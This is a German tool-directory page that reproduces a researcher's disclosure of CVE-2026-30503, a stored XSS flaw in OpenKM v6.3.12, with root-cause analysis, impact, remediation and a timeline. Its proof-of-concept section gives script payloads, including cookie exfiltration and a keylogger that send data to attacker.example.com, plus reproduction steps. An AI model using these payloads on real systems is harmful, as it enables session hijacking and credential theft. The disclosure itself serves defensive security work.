Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-30503-OpenKM-6.3.12-Stored-XSS — Detaillierte Offenlegung von CVE-2026-30503, einer gespeicherten XSS-Sicherheitslücke in OpenKM v6.3.12. Enthält Root-Cause-Analyse, PoC-Payloads, Auswirkungsbewertung und Abhilfeempfehlungen für Sicherheitsforscher und Pentester. | Kitploit
Tools/GitHubGitHub/dharmstm/cve-2026-30503-openkm-6.3.12-stored-xss
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPapers & ForschungLernen & Bildung
GitHubdharmstm/cve-2026-30503-openkm-6.3.12-stored-xss

CVE-2026-30503-OpenKM-6.3.12-Stored-XSS

Detaillierte Offenlegung von CVE-2026-30503, einer gespeicherten XSS-Sicherheitslücke in OpenKM v6.3.12. Enthält Root-Cause-Analyse, PoC-Payloads, Auswirkungsbewertung und Abhilfeempfehlungen für Sicherheitsforscher und Pentester.

Repository anzeigen
1vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛡️ CVE-2026-30503 — Stored XSS in OpenKM v6.3.12

CVE-Abzeichen OpenKM Typ Offenlegung Status

Entdeckt und gemeldet von Dharmendra Kumar — Sicherheitsforscher

Cybersicherheit | Penetrationstests | Schwachstellenforschung | Verantwortungsvolle Offenlegung


📌 Inhaltsverzeichnis

  • Übersicht
  • CVE-Details
  • Betroffenes Produkt
  • Schwachstellenbeschreibung
  • Grundursachenanalyse
  • Auswirkungen & Risikobewertung
Proof of Concept (PoC)
  • Abhilfe & Empfehlungen
  • Offenlegungszeitplan
  • Referenzen
  • Über den Forscher

  • 🔍 Übersicht

    Dieses Repository dokumentiert die verantwortungsvolle Offenlegung von CVE-2026-30503, einer Stored Cross-Site Scripting (XSS)-Schwachstelle, die in OpenKM v6.3.12 identifiziert wurde – einem Open-Source-Dokumentenmanagementsystem, das in Unternehmensumgebungen weit verbreitet ist.

    Die Schwachstelle ermöglicht es einem authentifizierten Angreifer, persistent bösartiges JavaScript in die Anwendung zu injizieren, das im Browserkontext jedes Benutzers (einschließlich Administratoren) ausgeführt wird, der anschließend den betroffenen Inhalt aufruft.

    ⚠️ Schweregrad: Hoch | Angriffsvektor: Netzwerk | Erforderliche Berechtigungen: Niedrig | Benutzerinteraktion: Erforderlich


    📋 CVE-Details

    FeldEinzelheiten
    CVE-IDCVE-2026-30503
    ProduktOpenKM
    Betroffene Versionv6.3.12
    SchwachstellenklasseStored Cross-Site Scripting (XSS)
    CWECWE-79: Unsachgemäße Neutralisierung von Eingaben während der Webseitengenerierung
    CVSS-VektorCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
    ForscherDharmendra Kumar
    Art der OffenlegungVerantwortungsvoll / Koordiniert

    📦 Betroffenes Produkt

    OpenKM ist ein kostenloses Open-Source-Dokumentenmanagementsystem (DMS), das eine Weboberfläche zum Verwalten, Prüfen und Verteilen von Geschäftsdokumenten bietet. Es wird weltweit von Unternehmen, Regierungsbehörden und Bildungseinrichtungen genutzt.

    • Produktname: OpenKM Document Management System
    • Betroffene Version: v6.3.12
    • Anbieter-Website: https://www.openkm.com
    • Kategorie: Dokumentenmanagementsystem (DMS)
    • Sprache/Stack: Java (JSP/Spring)

    🧨 Schwachstellenbeschreibung

    Mehrere Stored Cross-Site Scripting (XSS)-Schwachstellen wurden in OpenKM v6.3.12 entdeckt. Ein Angreifer mit niedrig privilegiertem authentifiziertem Zugriff kann beliebige JavaScript-Payloads in ein oder mehrere Eingabefelder injizieren. Diese Payloads werden dauerhaft im Backend der Anwendung gespeichert und automatisch ausgeführt, sobald ein Benutzer – einschließlich Administratoren – die betroffene Seite oder Komponente aufruft.

    Im Gegensatz zu Reflected XSS, bei dem das Opfer auf einen manipulierten Link klicken muss, sind Stored XSS-Payloads in der Anwendung selbst eingebettet, was sie erheblich gefährlicher und beständiger macht.

    Angreifbare Endpunkte

    • Benutzergesteuerte Eingabefelder in Dokumentmetadaten, Notizen oder Namensfeldern
    • Die Anwendung bereinigt oder kodiert Benutzereingaben nicht, bevor sie an den Browser zurückgegeben werden

    🔬 Grundursachenanalyse

    Die Schwachstelle ergibt sich aus drei sich verstärkenden Schwächen in der Eingabeverarbeitungskette der Anwendung:

    root@kitploit:~
    Benutzereingabe ──► [KEINE Validierung] ──► In DB gespeichert ──► [KEINE Ausgabekodierung] ──► Im Browser gerendert ──► XSS ausgeführt
    
    SchwachstelleBeschreibung
    ❌ Fehlende EingabevalidierungDie Anwendung schränkt Sonderzeichen (<, >, ", ', ;) in benutzerbereitgestellten Feldern nicht ein oder bereinigt sie nicht
    ❌ Fehlende AusgabekodierungGespeicherte Werte werden direkt in HTML gerendert, ohne HTML-Entity-Kodierung
    ❌ Unsicheres DOM-RenderingBenutzerbereitgestellte Daten werden ohne CSP- oder Bereinigungsmechanismen in den DOM-Kontext eingebettet

    💥 Auswirkungen und Risikobewertung

    Eine erfolgreiche Ausnutzung dieser Schwachstelle kann zu Folgendem führen:

    RisikoBeschreibung
    🍪 Session-HijackingDiebstahl authentifizierter Sitzungstoken durch Exfiltration von document.cookie
    👤 KontoübernahmeKompromittierung von Opferkonten, einschließlich Administratorkonten
    🔐 Credential-HarvestingEinschleusen von Phishing-Formularen zum Abfangen von Anmeldedaten
    📤 DatenernteStilles Extrahieren sensibler Dokumente oder Metadaten aus dem DMS
    ⚙️ Unbefugte AktionenDurchführung privilegierter Operationen im Namen des Opfers (Löschen/Ändern von Dokumenten)
    🎯 Admin-ZielausrichtungPayload wird im Admin-Panel ausgeführt, wenn ein Administrator den Inhalt prüft
    🔄 WurmverbreitungSelbstreplizierender XSS-Payload kann sich über Benutzer hinweg verbreiten

    🧪 Proof of Concept (PoC)

    ⚠️ Haftungsausschluss: Dieses PoC wird ausschließlich zu Bildungs- und Sicherheitsforschungszwecken im Rahmen der Grundsätze verantwortungsvoller Offenlegung geteilt. Verwenden Sie dies nicht gegen Systeme, die Sie nicht besitzen oder für deren Test Sie keine ausdrückliche schriftliche Genehmigung haben.

    Payload-Beispiel (Allgemein)

    root@kitploit:~
    // Grundlegendes PoC — demonstriert Skriptausführung
    <script>alert('CVE-2026-30503 - XSS von Dharmendra Kumar')</script>
    
    // Sitzungstoken-Exfiltration
    <script>fetch('https://attacker.example.com/steal?c='+document.cookie)</script>
    
    // Keylogger-Injektion
    <script>document.onkeypress=function(e){fetch('https://attacker.example.com/log?k='+e.key)}</script>
    

    Schritte zur Reproduktion

    1. Melden Sie sich mit einem niedrig privilegierten authentifizierten Konto bei OpenKM v6.3.12 an
    2. Navigieren Sie zum angreifbaren Eingabefeld (z. B. Dokumentmetadaten / Notizen / Titelfeld)
    3. Injizieren Sie einen XSS-Payload wie <script>alert(document.cookie)</script>
    4. Speichern / Übermitteln Sie den Eintrag
    5. Melden Sie sich als anderer Benutzer (oder Administrator) an und navigieren Sie zur betroffenen Ressource
    6. Beobachten Sie, wie der JavaScript-Payload im Browserkontext des Opfers ausgeführt wird

    🛠️ Abhilfe und Empfehlungen

    Für Entwickler / Anbieter

    EmpfehlungUmsetzung
    ✅ EingabevalidierungWhitelist erlaubter Zeichen; HTML-Sonderzeichen bei allen Benutzereingaben ablehnen oder entfernen
    ✅ AusgabekodierungKontextabhängige HTML-Kodierung (z. B. OWASP Java Encoder) vor der Darstellung von Daten in HTML verwenden
    ✅ Content Security Policy (CSP)Strenge CSP-Header implementieren: Content-Security-Policy: script-src 'self'
    ✅ HTTPOnly und Secure CookiesHttpOnly- und Secure-Flags auf allen Sitzungs-Cookies setzen, um JS-Zugriff zu verhindern
    ✅ Sicherheitsbibliotheken nutzenOWASP AntiSamy oder DOMPurify zur HTML-Bereinigung integrieren
    ✅ Sicherheitscode-ReviewAlle Rendering-Pfade auf unbereinigte benutzergesteuerte Daten prüfen
    ✅ UpgradeDen neuesten vom Anbieter bereitgestellten Patch anwenden oder auf eine gepatchte Version upgraden

    Für Systemadministratoren

    • 🔒 Zugriff auf die OpenKM-Instanz nur auf vertrauenswürdige Netzwerke beschränken
    • 📊 Anwendungslogs auf ungewöhnliche Aktivitäten oder unerwartete Skript-Tags in Eingabefeldern überwachen
    • 🔄 Die Anwendung auf dem neuesten gepatchten Release halten
    • 🧩 Eine Web Application Firewall (WAF) mit XSS-Erkennungsregeln als kompensierende Kontrolle bereitstellen

    📅 Offenlegungszeitplan

    DatumEreignis
    🔍 EntdeckungSchwachstelle während der Sicherheitsbewertung von OpenKM v6.3.12 identifiziert
    📧 Benachrichtigung des AnbietersErster Offenlegungsbericht an das Sicherheitsteam von OpenKM gesendet
    🤝 Bestätigung durch den AnbieterDas OpenKM-Team bestätigte den Bericht
    📝 CVE-VergabeCVE-2026-30503 durch das CVE-Programm vergeben
    🌐 Öffentliche OffenlegungKoordinierte öffentliche Offenlegung nach dem Abhilfezeitraum

    Diese Schwachstelle wurde gemäß den Best Practices für verantwortungsvolle Offenlegung offengelegt, mit Koordination mit dem Anbieter und dem CVE-Programm vor der öffentlichen Veröffentlichung.


    📚 Referenzen

    • 🔗 [ GitHub] (https://github.com/dharmstm/OpenKM-6.3-Stored-XSS-Report/).
    • 🔗 MITRE CVE-Eintrag — CVE-2026-30503
    • 🔗 NVD — National Vulnerability Database
    • 🔗 OpenKM Offizielle Website
    • 🔗 OWASP XSS Prevention Cheat Sheet
    • 🔗 CWE-79: Cross-site Scripting
    • 🔗 OWASP Top 10 — A03:2021 Injection

    👨‍💻 Über den Forscher

    Dharmendra Kumar

    Sicherheitsforscher | Penetrationstester | Bug Hunter

    Dharmendra Kumar ist ein unabhängiger Cybersicherheitsforscher, der sich auf Webanwendungssicherheit, Penetrationstests und verantwortungsvolle Schwachstellenoffenlegung spezialisiert hat. Mit dem Fokus auf die Identifizierung realer Sicherheitslücken in weit verbreiteter Software trägt seine Arbeit zur Verbesserung der Sicherheitslage weltweit genutzter Anwendungen bei.

    Fachgebiete:

    • 🌐 Penetrationstests von Webanwendungen
    • 🐛 Bug Bounty Hunting
    • 🔍 Schwachstellenforschung & CVE-Meldung
    • 📋 Verantwortungsvolle Offenlegung & Sicherheitshinweise
    • 🛡️ OWASP Top 10 Schwachstellen

    Kontakt:

    LinkedIn GitHub Twitter


    ⚖️ Rechtlicher Haftungsausschluss

    Dieses Repository ist ausschließlich für Bildungs- und Informationszwecke bestimmt. Die hier geteilten Schwachstellendetails und Proof-of-Concept-Payloads werden im Rahmen der Grundsätze verantwortungsvoller Offenlegung veröffentlicht. Der Autor befürwortet, ermutigt oder übernimmt keine Verantwortung für die unbefugte Nutzung dieser Informationen. Holen Sie stets ausdrückliche schriftliche Genehmigung ein, bevor Sie Sicherheitstests an einem System durchführen.


    🙏 Danksagungen

    Besonderer Dank geht an:

    • Das Entwicklungsteam von OpenKM für die Zusammenarbeit während des verantwortungsvollen Offenlegungsprozesses
    • Das CVE-Programm / MITRE Corporation für die Vergabe und Koordination der CVE-Kennung
    • Die breitere Sicherheitsforschungsgemeinschaft für ihre fortlaufenden Bemühungen, Software für alle sicherer zu machen

    ⭐ Falls diese Forschung hilfreich war, erwägen Sie, dieses Repository zu markieren.

    © 2026 Dharmendra Kumar — Alle Rechte vorbehalten

    Besucher

    Tool herunterladen